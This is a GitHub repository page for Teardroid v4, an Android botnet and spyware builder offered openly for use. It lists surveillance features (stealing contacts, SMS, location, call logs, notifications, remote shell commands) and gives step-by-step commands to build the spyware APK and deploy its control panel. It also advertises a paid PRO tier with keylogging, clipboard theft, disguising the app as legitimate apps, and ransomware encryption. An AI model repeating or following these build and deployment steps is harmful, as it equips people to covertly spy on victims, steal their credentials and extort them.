callmehalpha / Teardroid-phprat

:india: :robot: It's easy to use android botnet work without port forwarding, vps and android studio

Home Page:https://teardroidv4.deta.dev

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

๐Ÿค– Teardroid v4

Screenshot

๐Ÿ‡ฎ๐Ÿ‡ณ It's easy to use android botnet work without port forwarding, vps and android studio

GitHub issues Twitter Hacksec

๐Ÿš€ Features

  • Retrieve Contact
  • Retrieve SMS
  • Retrieve running Services
  • Retrieve Device Location (:worried: Only work when the app is open on newer devices)
  • Retrieve Call Logs
  • Run Shell Command
  • Change Wallpaper
  • Send SMS
  • Make Call
  • Get Installed Apps
  • Download File
  • Read Notification
  • Auto-Start

โš ๏ธ Requirement

  • Python3
  • Java
  • Linux or Windows os

Java version i used

$ java -version
openjdk version "11.0.13" 2021-10-19
OpenJDK Runtime Environment (build 11.0.13+8)
OpenJDK 64-Bit Server VM (build 11.0.13+8, mixed mode)

How to setup

  • Set up an account at deta.sh its free.
  • Click Deploy to Deta Button to configure your control panel.
  • Clone Teardroid-phprat repo with the following command.
$ git clone https://github.com/ScRiPt1337/Teardroid-phprat
  • cd in the Teardroid-phprat directory, then type the command below to install all dependencies
$ pip install -r requirements.txt
  • Run the following command to see the options that we can use with the builder.
$ python Teardroid.py                                                                                                         
  ______                    __           _     __         __ __
 /_  __/__  ____ __________/ /________  (_)___/ /  _   __/ // /
  / / / _ \/ __ `/ ___/ __  / ___/ __ \/ / __  /  | | / / // /_
 / / /  __/ /_/ / /  / /_/ / /  / /_/ / / /_/ /   | |/ /__  __/
/_/  \___/\__,_/_/   \__,_/_/   \____/_/\__,_/    |___/  /_/   
                                                               

usage: Teardroid.py [-h] [-v] [-b]

Teardroid v4.0 - A tool to build teardroid spyware for Android devices.

options:
  -h, --help     show this help message and exit
  -v, --version  Version of Teardroid
  -b , --build   Build Teardroid with custom name [ex: Teardroid.py -b teardroid]
  • To create an apk execute the following command.
$ python Teardroid.py -b your_app_name
  • It will prompt you with your Control Panel url enter your deta micro URL (without / at the end of the url).
  • You will also be prompted for the title and text of the notification. Enter what you want to display on the notification.
  • DONE

Deploy

๐ŸŒ† Build using bot

Manually deploy the Teardroid control panel

  • Set up an account at deta.sh
  • Install Deta Cli
  • Logging in to Deta via the CLI
  • Create a new Python Micro
  • Clone Teardroidv4_api repo
  • Move all Teardroidv4_api Files to your deta micro folder.
  • Deploy the Control panel using the following command.
$ deta deploy

Dashboard

  • visit : https://{your server url}/v4/overview
  • defualt username/password is : admin/admin

Screenshot

  • Builder

  • Overview

  • TaskManager

Demo Video

๐Ÿง Teardroid PRO

  • Go to telegram and search @teardroid_bot to know how you can get it

๐ŸŒ  PRO Features

  • Get users key strokes (whatever they type in there keyboard like username password etc)
  • Get users clipboard data (get whatever is copied in there clipboard)
  • A Guide about how you can manually bind teardroid pro with any legitimate app
  • Ability to hide behind any other legitimate app without binding (like : Facebook, Twitter, LinkedIn etc)
  • Encrypt files with AES encryption (work as ransomware)
  • Robust connection with server we will setup everything for you on aws or any other self hosting server
  • 24x7 support for 3 month (any kind of help or support related to teardroid will be given by our team)

Support me

"Buy Me A Coffee"

Contact info

About

:india: :robot: It's easy to use android botnet work without port forwarding, vps and android studio

https://teardroidv4.deta.dev

License:MIT License


Languages

Language:Smali 99.9%Language:Kotlin 0.1%Language:Python 0.0%Language:Shell 0.0%Language:Batchfile 0.0%